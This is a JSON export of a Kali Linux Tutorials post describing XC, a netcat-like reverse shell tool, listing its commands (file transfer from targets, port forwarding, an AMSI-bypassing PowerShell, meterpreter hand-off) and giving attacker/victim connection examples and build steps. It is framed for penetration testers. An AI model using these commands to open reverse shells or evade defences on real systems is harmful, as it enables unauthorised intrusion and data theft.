{"id":32061,"date":"2024-02-15T12:28:29","date_gmt":"2024-02-15T12:28:29","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=32061"},"modified":"2024-02-15T12:28:33","modified_gmt":"2024-02-15T12:28:33","slug":"xc-2","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/xc-2\/","title":{"rendered":"XC : A Comprehensive Guide To Netcat &#8211; Like Reverse Shell For Linux And Windows"},"content":{"rendered":"\n<p>A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. <\/p>\n\n\n\n<p>With its array of features including file manipulation, port forwarding, and plugin execution, XC offers versatile capabilities for penetration testers and ethical hackers. <\/p>\n\n\n\n<p>This article provides a detailed overview and setup guide for leveraging XC&#8217;s functionalities effectively.<\/p>\n\n\n\n<p>Netcat like reverse shell for Linux &amp; Windows.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/xct\/xc#features\"><\/a><strong>Features<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/xct\/xc#windows\"><\/a><strong>Windows<\/strong><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>Usage:\r\n\u2514 Shared Commands:  !exit\r\n  !upload &lt;src> &lt;dst>\r\n   * uploads a file to the target\r\n  !download &lt;src> &lt;dst>\r\n   * downloads a file from the target\r\n  !lfwd &lt;localport> &lt;remoteaddr> &lt;remoteport>\r\n   * local portforwarding (like ssh -L)\r\n  !rfwd &lt;remoteport> &lt;localaddr> &lt;localport>\r\n   * remote portforwarding (like ssh -R)\r\n  !lsfwd\r\n   * lists active forwards\r\n  !rmfwd &lt;index>\r\n   * removes forward by index\r\n  !plugins\r\n   * lists available plugins\r\n  !plugin &lt;plugin>\r\n   * execute a plugin\r\n  !spawn &lt;port>\r\n   * spawns another client on the specified port\r\n  !shell\r\n   * runs \/bin\/sh\r\n  !runas &lt;username> &lt;password> &lt;domain>\r\n   * restart xc with the specified user\r\n  !met &lt;port>\r\n   * connects to a x64\/meterpreter\/reverse_tcp listener\r\n\u2514 OS Specific Commands:\r\n  !powershell\r\n    * starts powershell with AMSI Bypass\r\n  !rc &lt;port>\r\n    * connects to a local bind shell and restarts this client over it\r\n  !runasps &lt;username> &lt;password> &lt;domain>\r\n    * restart xc with the specified user using powershell\r\n  !vulns\r\n    * checks for common vulnerabilities<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Linux<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>Usage:\r\n\u2514 Shared Commands:  !exit\r\n  !upload &lt;src> &lt;dst>\r\n   * uploads a file to the target\r\n  !download &lt;src> &lt;dst>\r\n   * downloads a file from the target\r\n  !lfwd &lt;localport> &lt;remoteaddr> &lt;remoteport>\r\n   * local portforwarding (like ssh -L)\r\n  !rfwd &lt;remoteport> &lt;localaddr> &lt;localport>\r\n   * remote portforwarding (like ssh -R)\r\n  !lsfwd\r\n   * lists active forwards\r\n  !rmfwd &lt;index>\r\n   * removes forward by index\r\n  !plugins\r\n   * lists available plugins\r\n  !plugin &lt;plugin>\r\n   * execute a plugin\r\n  !spawn &lt;port>\r\n   * spawns another client on the specified port\r\n  !shell\r\n   * runs \/bin\/sh\r\n  !runas &lt;username> &lt;password> &lt;domain>\r\n   * restart xc with the specified user\r\n  !met &lt;port>\r\n   * connects to a x64\/meterpreter\/reverse_tcp listener\r\n\u2514 OS Specific Commands:\r\n !ssh &lt;port>\r\n   * starts sshd with the configured keys on the specified port<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Examples<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Linux Attacker:&nbsp;<code>rlwrap xc -l -p 1337<\/code>&nbsp;(Server)<\/li>\n\n\n\n<li>WindowsVictim :&nbsp;<code>xc.exe 10.10.14.4 1337<\/code>&nbsp;(Client)<\/li>\n\n\n\n<li>Argumentless:&nbsp;<code>xc_10.10.14.4_1337.exe<\/code>&nbsp;(Client)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/xct\/xc#setup\"><\/a><strong>Setup<\/strong><\/h2>\n\n\n\n<p>Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu:\u00a0<code>go version go1.16.2 linux\/amd64<\/code>\u00a0and kali\u00a0<code>go version go1.15.9 linux\/amd64<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>git clone --recurse-submodules https:\/\/github.com\/xct\/xc.git\r\n\r\nGO111MODULE=off go get golang.org\/x\/sys\/...\r\nGO111MODULE=off go get golang.org\/x\/text\/encoding\/unicode\r\nGO111MODULE=off go get github.com\/hashicorp\/yamux\r\nGO111MODULE=off go get github.com\/libp2p\/go-reuseport\r\nsudo apt-get install rlwrap upx<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Linux:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 build.py<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. With its array of features including file manipulation, port forwarding, and plugin execution, XC offers versatile capabilities for penetration testers and ethical hackers. This article provides a detailed overview and setup guide for leveraging XC&#8217;s functionalities effectively. Netcat like reverse shell for [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":32066,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[20],"tags":[737,6321,6052,6325,4616],"class_list":["post-32061","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security","tag-cybersecurity","tag-informationsecurity","tag-kalilinux","tag-kalilinuxtools","tag-xc"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>XC : A Comprehensive Guide To Netcat - Like Reverse Shell For<\/title>\n<meta name=\"description\" content=\"A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. With its array of features including file manipulation\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/xc-2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"XC : A Comprehensive Guide To Netcat - Like Reverse Shell For\" \/>\n<meta property=\"og:description\" content=\"A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. With its array of features including file manipulation\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/xc-2\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2024-02-15T12:28:29+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-15T12:28:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp\" \/>\n<meta name=\"author\" content=\"Varshini\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Varshini\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/\"},\"author\":{\"name\":\"Varshini\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\"},\"headline\":\"XC : A Comprehensive Guide To Netcat &#8211; Like Reverse Shell For Linux And Windows\",\"datePublished\":\"2024-02-15T12:28:29+00:00\",\"dateModified\":\"2024-02-15T12:28:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/\"},\"wordCount\":111,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp\",\"keywords\":[\"cybersecurity\",\"informationsecurity\",\"kalilinux\",\"kalilinuxtools\",\"XC\"],\"articleSection\":[\"Cyber security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/xc-2\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/\",\"name\":\"XC : A Comprehensive Guide To Netcat - Like Reverse Shell For\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp\",\"datePublished\":\"2024-02-15T12:28:29+00:00\",\"dateModified\":\"2024-02-15T12:28:33+00:00\",\"description\":\"A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. With its array of features including file manipulation\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/xc-2\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp\",\"width\":\"1600\",\"height\":\"900\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\",\"name\":\"Varshini\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"caption\":\"Varshini\"},\"description\":\"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.\",\"sameAs\":[\"http:\/\/kalilinuxtutorials.com\",\"https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/\"],\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"XC : A Comprehensive Guide To Netcat - Like Reverse Shell For","description":"A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. With its array of features including file manipulation","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/xc-2\/","og_locale":"en_US","og_type":"article","og_title":"XC : A Comprehensive Guide To Netcat - Like Reverse Shell For","og_description":"A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. With its array of features including file manipulation","og_url":"https:\/\/kalilinuxtutorials.com\/xc-2\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2024-02-15T12:28:29+00:00","article_modified_time":"2024-02-15T12:28:33+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","type":"","width":"","height":""}],"author":"Varshini","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"Varshini","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/"},"author":{"name":"Varshini","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa"},"headline":"XC : A Comprehensive Guide To Netcat &#8211; Like Reverse Shell For Linux And Windows","datePublished":"2024-02-15T12:28:29+00:00","dateModified":"2024-02-15T12:28:33+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/"},"wordCount":111,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","keywords":["cybersecurity","informationsecurity","kalilinux","kalilinuxtools","XC"],"articleSection":["Cyber security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/xc-2\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/","url":"https:\/\/kalilinuxtutorials.com\/xc-2\/","name":"XC : A Comprehensive Guide To Netcat - Like Reverse Shell For","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","datePublished":"2024-02-15T12:28:29+00:00","dateModified":"2024-02-15T12:28:33+00:00","description":"A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems. With its array of features including file manipulation","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/xc-2\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/xc-2\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","width":"1600","height":"900"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa","name":"Varshini","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","caption":"Varshini"},"description":"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.","sameAs":["http:\/\/kalilinuxtutorials.com","https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/"],"url":"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWUzgdsHhwDE9zwmr9ZmgGa6nblYfiB95Xbjao-Lgf9hLP4qWKngNvuewdP8ajzFM4hZzDcTs21zGD78FwtbC2OSLH80VrM9LYr2v7MWyFdHfLLQPgQ2w_H9MfMhk_7wuDVC4-H-5qz4KYyd_SwdTEx4vIZPCZoOEJ3ZvmKS_5I0canWgdR8GIbnP1Rvwi\/s16000\/Untitled%20design%20(22).webp","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":21374,"url":"https:\/\/kalilinuxtutorials.com\/xc\/","url_meta":{"origin":32061,"position":0},"title":"XC : A Small Reverse Shell For Linux And Windows","author":"R K","date":"January 26, 2022","format":false,"excerpt":"XC is a Netcat like reverse shell for Linux & Windows. Features Windows Usage:\u2514 Shared Commands: !exit!upload uploads a file to the target!downloaddownloads a file from the target!lfwdlocal portforwarding (like ssh -L)!rfwdremote portforwarding (like ssh -R)!lsfwdlists active forwards!rmfwdremoves forward by index!pluginslists available plugins!pluginexecute a plugin!spawnspawns another client on the specified\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEgQBVN90VsAw7erLA4up8S4UpxQE9Dt8dad5iNRqBAwDSfR0fsXJKIzNmbpRASkmoIpAKI7Tw4wcP0_j_3m-9YesEfyUiqpivfmkiqCkM5o0y7qLzlTvQTyqIi8pMIYuNax6qTbIyIcduEAJePtHA8XpVom4RXy2uxSvXQNkvELE7tngS9SSXDAcILK=s728","width":350,"height":200,"srcset":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEgQBVN90VsAw7erLA4up8S4UpxQE9Dt8dad5iNRqBAwDSfR0fsXJKIzNmbpRASkmoIpAKI7Tw4wcP0_j_3m-9YesEfyUiqpivfmkiqCkM5o0y7qLzlTvQTyqIi8pMIYuNax6qTbIyIcduEAJePtHA8XpVom4RXy2uxSvXQNkvELE7tngS9SSXDAcILK=s728 1x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEgQBVN90VsAw7erLA4up8S4UpxQE9Dt8dad5iNRqBAwDSfR0fsXJKIzNmbpRASkmoIpAKI7Tw4wcP0_j_3m-9YesEfyUiqpivfmkiqCkM5o0y7qLzlTvQTyqIi8pMIYuNax6qTbIyIcduEAJePtHA8XpVom4RXy2uxSvXQNkvELE7tngS9SSXDAcILK=s728 1.5x, https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEgQBVN90VsAw7erLA4up8S4UpxQE9Dt8dad5iNRqBAwDSfR0fsXJKIzNmbpRASkmoIpAKI7Tw4wcP0_j_3m-9YesEfyUiqpivfmkiqCkM5o0y7qLzlTvQTyqIi8pMIYuNax6qTbIyIcduEAJePtHA8XpVom4RXy2uxSvXQNkvELE7tngS9SSXDAcILK=s728 2x"},"classes":[]},{"id":29206,"url":"https:\/\/kalilinuxtutorials.com\/powermeup-a-small-library-of-powershell-scripts-for-post-exploitation-that-you-may-need-or-use\/","url_meta":{"origin":32061,"position":1},"title":"PowerMeUp : A Small Library Of Powershell Scripts For Post Exploitation That You May Need Or Use!","author":"R K","date":"June 30, 2023","format":false,"excerpt":"This is a powershell reverse shell that executes the commands and or scripts that you add to the powerreverse.ps1 file as well as a small library of Post-Exploitation scripts. This also can be used for post exploitation and lateral movement even. Please use at your own risk I am not\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjeHF6IYVex_qAke5KoUs6RZ7yWWKEy_gTyQMjQ_kFVfSM1Fb0o8W764rtwI_HsqwycqUvrjbztc9Rp_RAZyGe1BzLGH4Hpi9aCcvgq7b3IBjUbv84hZ4PNjFMjyYDWfRyzB0QfYzEVLVz49nz-TSlCPdm_qmiPS4QiPL-jDeeK4BKc90hzeeBzMf-Y\/s16000\/kali%20temp%20%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjeHF6IYVex_qAke5KoUs6RZ7yWWKEy_gTyQMjQ_kFVfSM1Fb0o8W764rtwI_HsqwycqUvrjbztc9Rp_RAZyGe1BzLGH4Hpi9aCcvgq7b3IBjUbv84hZ4PNjFMjyYDWfRyzB0QfYzEVLVz49nz-TSlCPdm_qmiPS4QiPL-jDeeK4BKc90hzeeBzMf-Y\/s16000\/kali%20temp%20%281%29.png?resize=350%2C200&ssl=1 1x, 